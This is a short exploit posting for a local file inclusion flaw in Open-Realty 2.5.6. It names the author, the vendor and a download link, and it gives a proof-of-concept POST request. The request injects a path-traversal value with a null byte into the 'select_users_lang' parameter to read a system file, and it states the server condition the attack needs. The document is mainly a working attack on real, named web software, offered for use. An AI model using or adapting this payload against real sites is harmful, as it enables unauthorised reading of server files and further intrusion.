#################################################
### Exploit Title: Open-Realty v2.5.6 Local File Inclusion Vulnerability
### Date: 06/10/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.open-realty.org/
### Software Link: http://www.open-realty.org/release/open-realty2.5.6.zip
### Version: 2.5.6
### Tested on: Linux/Windows 
#################################################

1- Local File Inclusion :

* P.O.C :

POST http://127.0.0.1/open-realty2.5.6/index.php

Inject by POST method:

select_users_lang=../../../../../../../boot.ini%00

############################################

# Note :

Must be magic_quotes_gpc = Off

# Greetz to my friendz